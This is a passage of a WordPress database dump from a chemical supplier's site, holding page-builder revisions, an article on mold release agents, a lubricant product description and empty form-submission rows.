span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-01-12 19:23:58', '2017-01-12 19:23:58', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3452, 2, '2017-01-12 19:26:58', '2017-01-12 19:26:58', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-01-12 19:26:58', '2017-01-12 19:26:58', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3453, 0, '2017-01-12 20:09:42', '2017-01-12 20:09:42', '', '', '', 'publish', 'closed', 'closed', '', '3453', '', '', '2017-01-12 20:09:42', '2017-01-12 20:09:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/3453/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3454, 2, '2017-01-12 21:07:34', '2017-01-12 21:07:34', '', '', '', 'publish', 'closed', 'closed', '', '3454', '', '', '2017-01-12 21:07:34', '2017-01-12 21:07:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3454/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3455, 2, '2017-01-12 21:07:50', '2017-01-12 21:07:50', '', '', '', 'publish', 'closed', 'closed', '', '3455', '', '', '2017-01-12 21:07:50', '2017-01-12 21:07:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/3455/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3456, 0, '2017-01-12 21:22:03', '2017-01-12 21:22:03', '', '', '', 'publish', 'closed', 'closed', '', '3456', '', '', '2017-01-12 21:22:03', '2017-01-12 21:22:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/3456/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3457, 0, '2017-01-12 22:37:01', '2017-01-12 22:37:01', '', '', '', 'publish', 'closed', 'closed', '', '3457', '', '', '2017-01-12 22:37:01', '2017-01-12 22:37:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/3457/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3458, 0, '2017-01-13 01:35:51', '2017-01-13 01:35:51', '', '', '', 'publish', 'closed', 'closed', '', '3458', '', '', '2017-01-13 01:35:51', '2017-01-13 01:35:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/3458/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3459, 0, '2017-01-13 03:38:28', '2017-01-13 03:38:28', '', '', '', 'publish', 'closed', 'closed', '', '3459', '', '', '2017-01-13 03:38:28', '2017-01-13 03:38:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/3459/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3460, 0, '2017-01-13 15:19:49', '2017-01-13 15:19:49', '', '', '', 'publish', 'closed', 'closed', '', '3460', '', '', '2017-01-13 15:19:49', '2017-01-13 15:19:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/3460/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3461, 0, '2017-01-13 18:44:09', '2017-01-13 18:44:09', '', '', '', 'publish', 'closed', 'closed', '', '3461', '', '', '2017-01-13 18:44:09', '2017-01-13 18:44:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/3461/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3462, 0, '2017-01-13 21:19:36', '2017-01-13 21:19:36', '', '', '', 'publish', 'closed', 'closed', '', '3462', '', '', '2017-01-13 21:19:36', '2017-01-13 21:19:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/3462/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3463, 0, '2017-01-16 06:13:06', '2017-01-16 06:13:06', '', '', '', 'publish', 'closed', 'closed', '', '3463', '', '', '2017-01-16 06:13:06', '2017-01-16 06:13:06', '', 0, 'https://www.miller-stephenson.com/nf_sub/3463/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3464, 0, '2017-01-16 07:38:24', '2017-01-16 07:38:24', '', '', '', 'publish', 'closed', 'closed', '', '3464', '', '', '2017-01-16 07:38:24', '2017-01-16 07:38:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3464/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3465, 0, '2017-01-16 11:36:24', '2017-01-16 11:36:24', '', '', '', 'publish', 'closed', 'closed', '', '3465', '', '', '2017-01-16 11:36:24', '2017-01-16 11:36:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3465/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3466, 344, '2017-01-16 18:01:08', '2017-01-16 18:01:08', '', '', '', 'publish', 'closed', 'closed', '', '3466', '', '', '2017-01-16 18:01:09', '2017-01-16 18:01:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/3466/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3467, 0, '2017-01-16 19:13:09', '2017-01-16 19:13:09', '', '', '', 'publish', 'closed', 'closed', '', '3467', '', '', '2017-01-16 19:13:09', '2017-01-16 19:13:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/3467/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3468, 0, '2017-01-16 19:32:03', '2017-01-16 19:32:03', '', '', '', 'publish', 'closed', 'closed', '', '3468', '', '', '2017-01-16 19:32:04', '2017-01-16 19:32:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/3468/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3469, 0, '2017-01-16 19:51:40', '2017-01-16 19:51:40', '', '', '', 'publish', 'closed', 'closed', '', '3469', '', '', '2017-01-16 19:51:40', '2017-01-16 19:51:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/3469/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3470, 2, '2017-01-16 20:29:58', '2017-01-16 20:29:58', '<h3>Mold Release Agent: Which is right for you?</h3>\n<p>Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agent are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:</p>\n<ul>\n<li>Surface adhesion and durability</li>\n<li>Ability to form a thin-film</li>\n<li>Sufficient surface slip</li>\n<li>Chemical inertness to the molding process and molding substrate</li>\n<li>Number of releases per application</li>\n</ul>\n<p>Release agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.</p>\n<p>Miller-Stephenson specializes in providing only the highest performing and cost-effective mold release agent solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane based release agents. Our company is 100% back-integrated meaning our manufacturing, inventory, and quality are maintained regardless of flucuations in the market.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.</p>\n<p><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Dry Film Release Agents</strong></a></p>\n<p>[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]</p>\n<p>Miller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform dry, thin films that exhibit excellent surface adhesion and durability. Miller-Stephenson PTFE release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.</p>\n<p>Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. Our PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.</p>\n<p><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">Thermoset polysiloxanes</a> (ReleaSys)</strong></p>\n<p>[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]</p>\n<p>Thermoset polysiloxanes are the newest generation of mold release agent, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.</p>\n<p>Miller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.</p>\n<p>Miller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.</p>\n[ux_product_categories ids="21,16,20" number="10"]\n\n<p>To learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></p>\n<h3>Technical or Application Support:</h3>\n<ul>\n<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\n<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\n<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2017-01-16 20:29:58', '2017-01-16 20:29:58', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3471, 0, '2017-01-16 22:29:53', '2017-01-16 22:29:53', '', '', '', 'publish', 'closed', 'closed', '', '3471', '', '', '2017-01-16 22:29:53', '2017-01-16 22:29:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/3471/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3472, 0, '2017-01-17 01:54:34', '2017-01-17 01:54:34', '', '', '', 'publish', 'closed', 'closed', '', '3472', '', '', '2017-01-17 01:54:34', '2017-01-17 01:54:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3472/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3473, 0, '2017-01-17 15:51:08', '2017-01-17 15:51:08', '', '', '', 'publish', 'closed', 'closed', '', '3473', '', '', '2017-01-17 15:51:08', '2017-01-17 15:51:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/3473/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3474, 0, '2017-01-17 16:11:16', '2017-01-17 16:11:16', '', '', '', 'publish', 'closed', 'closed', '', '3474', '', '', '2017-01-17 16:11:16', '2017-01-17 16:11:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3474/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3475, 0, '2017-01-17 16:13:46', '2017-01-17 16:13:46', '', '', '', 'publish', 'closed', 'closed', '', '3475', '', '', '2017-01-17 16:13:46', '2017-01-17 16:13:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/3475/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3476, 0, '2017-01-17 16:16:46', '2017-01-17 16:16:46', '', '', '', 'publish', 'closed', 'closed', '', '3476', '', '', '2017-01-17 16:16:47', '2017-01-17 16:16:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/3476/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3477, 0, '2017-01-17 16:26:33', '2017-01-17 16:26:33', '', '', '', 'publish', 'closed', 'closed', '', '3477', '', '', '2017-01-17 16:26:33', '2017-01-17 16:26:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/3477/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3478, 2, '2017-01-17 17:48:56', '2017-01-17 17:48:56', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\r\n\r\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" position_y="20" text_align="left"]\r\n\r\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\r\n<h1><strong>ReleaSys</strong></h1>\r\n<strong><em>Miller-Stephenson Exclusive Product</em></strong><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys Release Agent is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release agent system on the market, capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" style="primary" link="https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-1.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2017-01-17 17:48:56', '2017-01-17 17:48:56', '', 455, 'https://www.miller-stephenson.com/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3479, 0, '2017-01-17 18:16:33', '2017-01-17 18:16:33', '', '', '', 'publish', 'closed', 'closed', '', '3479', '', '', '2017-01-17 18:16:34', '2017-01-17 18:16:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3479/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3480, 2, '2017-01-17 19:48:35', '2017-01-17 19:48:35', '', 'Release Agents', '', 'publish', 'closed', 'closed', '', 'release-agents', '', '', '2017-01-17 19:52:07', '2017-01-17 19:52:07', '', 0, 'https://www.miller-stephenson.com/?post_type=dp_template&#038;p=3480', 0, 'dp_template', '', 0); 
INSERT INTO `wp_posts` VALUES (3482, 2, '2017-01-17 20:35:45', '2017-01-17 20:35:45', '<h3><strong><span style="font-size: 14.4px;">TriboSys™ Fluorinated Synthetic Biocompatible Lubricants</span></strong></h3>\n<span style="font-size: 14.4px;">TriboSys™ PFPE (perfluoropolyether) biocompatible lubricants, oils and greases provide superior quality lubrication under the most challenging medical application in comparison to hydrocarbon and silicone alternatives. TriboSys™ was designed to decrease wear and extend service intervals on all medical devices. Medical device engineers will value the dramatic decrease in mechanical wear, unwanted noise, and broad temperature range our lubricants impart.  All variants of TriboSys are unaffected by all forms of sterilization and will not transfer or degrade under these conditions. Benefits include:</span>\n<ul>\n 	<li class="Body">Superior Lubrication over conventional alternatives</li>\n 	<li class="Body">Biocompatible (ISO 10993)</li>\n 	<li class="Body">Chemically Inert; Non-<wbr />nutrient</li>\n 	<li class="Body">Non-<wbr />Flammable; Oxygen-<wbr />safe</li>\n 	<li class="Body">Odorless and Non-<wbr />Staining</li>\n</ul>\nThese biocompatible lubricants were specially designed to serve the medical industry. Meeting ISO 10993 biocompatibility standards these lubricants are ideal for medical devices. Devices such as <span class="C-12">Single and Multi-<wbr />Use Surgical Device Housings and Compressed Medical Gasses. </span>\n<h4 class="Body"><span class="C-12"><strong>Single and Multi-<wbr />Use Surgical Device Housings</strong>:</span></h4>\n<p class="Body"><span class="C-8">TriboSys™ is a high-<wbr />performance fluorinated lubricant that exhibits exceptional stability and will minimize mechanical wear </span><span class="C-8">allowing critical surgical devices to perform reliably and as designed. These biocompatible oils and greases are non-<wbr />nutrient ensuring microbial.</span></p>\n\n<h4 class="Body"><strong>Compressed Medical Gases:</strong></h4>\n<p class="Body">TriboSys™ grease is chemically inert and oxygen stable. This makes MilLube™ the lubricant of choice for medical gas cylinders, anesthesia machines, and oxygen valves.</p>', 'TriboSys™ Fluorinated Synthetic Lubricants', 'TriboSys PFPE (perfluoropolyether) oils and greases provide superior quality lubrication under the most challenging medical application in comparison to hydrocarbon and silicone alternatives. TriboSys was designed to decrease wear and extend service intervals on all medical devices. Medical device engineers will value the dramatic decrease in mechanical wear, unwanted noise, and broad temperature range our lubricants impart.  All variants of TriboSys are unaffected by all forms of sterilization and will not transfer or degrade under these conditions. Benefits include:\n<ul>\n 	<li class="Body">Superior Lubrication over conventional alternatives</li>\n 	<li class="Body">Biocompatible (ISO 10993)</li>\n 	<li class="Body">Chemically Inert; Non-<wbr />nutrient</li>\n 	<li class="Body">Non-<wbr />Flammable; Oxygen-<wbr />safe</li>\n 	<li class="Body">Odorless and Non-<wbr />Staining</li>\n</ul>', 'inherit', 'closed', 'closed', '', '468-autosave-v1', '', '', '2017-01-17 20:35:45', '2017-01-17 20:35:45', '', 468, 'https://www.miller-stephenson.com/468-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3483, 0, '2017-01-18 13:08:28', '2017-01-18 13:08:28', '', '', '', 'publish', 'closed', 'closed', '', '3483', '', '', '2017-01-18 13:08:29', '2017-01-18 13:08:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3483/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3484, 0, '2017-01-18 15:42:04', '2017-01-18 15:42:04', '', '', '', 'publish', 'closed', 'closed', '', '3484', '', '', '2017-01-18 15:42:04', '2017-01-18 15:42:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/3484/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3485, 0, '2017-01-19 05:43:54', '2017-01-19 05:43:54', '', '', '', 'publish', 'closed', 'closed', '', '3485', '', '', '2017-01-19 05:43:54', '2017-01-19 05:43:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/3485/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3488, 0, '2017-01-19 12:30:14', '2017-01-19 12:30:14', '', '', '', 'publish', 'closed', 'closed', '', '3488', '', '', '2017-01-19 12:30:15', '2017-01-19 12:30:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/3488/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3489, 0, '2017-01-19 13:29:32', '2017-01-19 13:29:32', '', '', '', 'publish', 'closed', 'closed', '', '3489', '', '', '2017-01-19 13:29:32', '2017-01-19 13:29:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/3489/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3490, 0, '2017-01-19 14:23:16', '2017-01-19 14:23:16', '', '', '', 'publish', 'closed', 'closed', '', '3490', '', '', '2017-01-19 14:23:16', '2017-01-19 14:23:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3490/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3491, 0, '2017-01-19 18:08:07', '2017-01-19 18:08:07', '', '', '', 'publish', 'closed', 'closed', '', '3491', '', '', '2017-01-19 18:08:07', '2017-01-19 18:08:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3491/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3492, 0, '2017-01-19 19:21:46', '2017-01-19 19:21:46', '', '', '', 'publish', 'closed', 'closed', '', '3492', '', '', '2017-01-19 19:21:46', '2017-01-19 19:21:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/3492/', 0, 'nf_sub', '', 0); 
